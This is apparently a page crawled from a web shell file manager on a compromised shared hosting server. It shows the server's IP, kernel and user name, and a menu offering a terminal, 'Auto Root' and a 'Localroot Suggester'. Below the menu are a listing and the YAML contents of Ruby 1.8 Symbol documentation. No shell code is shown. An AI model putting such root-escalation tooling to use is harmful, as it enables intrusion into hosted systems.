Linux premium71.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
Server IP : 198.187.29.8 & Your IP : 216.73.216.155
Domains :
Cant Read [ /etc/named.conf ]
User : cleahvkv
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby18 /
share /
ri /
1.8 /
system /
Symbol /
Delete
Unzip
Name
Size
Permission
Date
Action
%3d%3d%3d-i.yaml
1.33
KB
-rw-r--r--
2023-07-26 13:47
all_symbols-c.yaml
809
B
-rw-r--r--
2023-07-26 13:47
cdesc-Symbol.yaml
1.63
KB
-rw-r--r--
2023-07-26 13:47
dclone-i.yaml
166
B
-rw-r--r--
2023-07-26 13:47
id2name-i.yaml
400
B
-rw-r--r--
2023-07-26 13:47
inspect-i.yaml
382
B
-rw-r--r--
2023-07-26 13:47
to_i-i.yaml
444
B
-rw-r--r--
2023-07-26 13:47
to_int-i.yaml
212
B
-rw-r--r--
2023-07-26 13:47
to_proc-i.yaml
426
B
-rw-r--r--
2023-07-26 13:47
to_s-i.yaml
394
B
-rw-r--r--
2023-07-26 13:47
to_sym-i.yaml
385
B
-rw-r--r--
2023-07-26 13:47
to_yaml-i.yaml
179
B
-rw-r--r--
2023-07-26 13:47
yaml_new-c.yaml
187
B
-rw-r--r--
2023-07-26 13:47
Save
Rename
--- !ruby/object:RI::ClassDescription attributes: [] class_methods: - !ruby/object:RI::MethodSummary name: all_symbols - !ruby/object:RI::MethodSummary name: yaml_new comment: - !ruby/struct:SM::Flow::P body: <tt>Symbol</tt> objects represent names and some strings inside the Ruby interpreter. They are generated using the <tt>:name</tt> and <tt>:"string"</tt> literals syntax, and by the various <tt>to_sym</tt> methods. The same <tt>Symbol</tt> object will be created for a given name or string for the duration of a program's execution, regardless of the context or meaning of that name. Thus if <tt>Fred</tt> is a constant in one context, a method in another, and a class in a third, the <tt>Symbol</tt> <tt>:Fred</tt> will be the same object in all three contexts. - !ruby/struct:SM::Flow::VERB body: " module One\n class Fred\n end\n $f1 = :Fred\n end\n module Two\n Fred = 1\n $f2 = :Fred\n end\n def Fred()\n end\n $f3 = :Fred\n $f1.id #=> 2514190\n $f2.id #=> 2514190\n $f3.id #=> 2514190\n" constants: [] full_name: Symbol includes: [] instance_methods: - !ruby/object:RI::MethodSummary name: === - !ruby/object:RI::MethodSummary name: dclone - !ruby/object:RI::MethodSummary name: id2name - !ruby/object:RI::MethodSummary name: inspect - !ruby/object:RI::MethodSummary name: to_i - !ruby/object:RI::MethodSummary name: to_int - !ruby/object:RI::MethodSummary name: to_proc - !ruby/object:RI::MethodSummary name: to_s - !ruby/object:RI::MethodSummary name: to_sym - !ruby/object:RI::MethodSummary name: to_yaml name: Symbol superclass: Object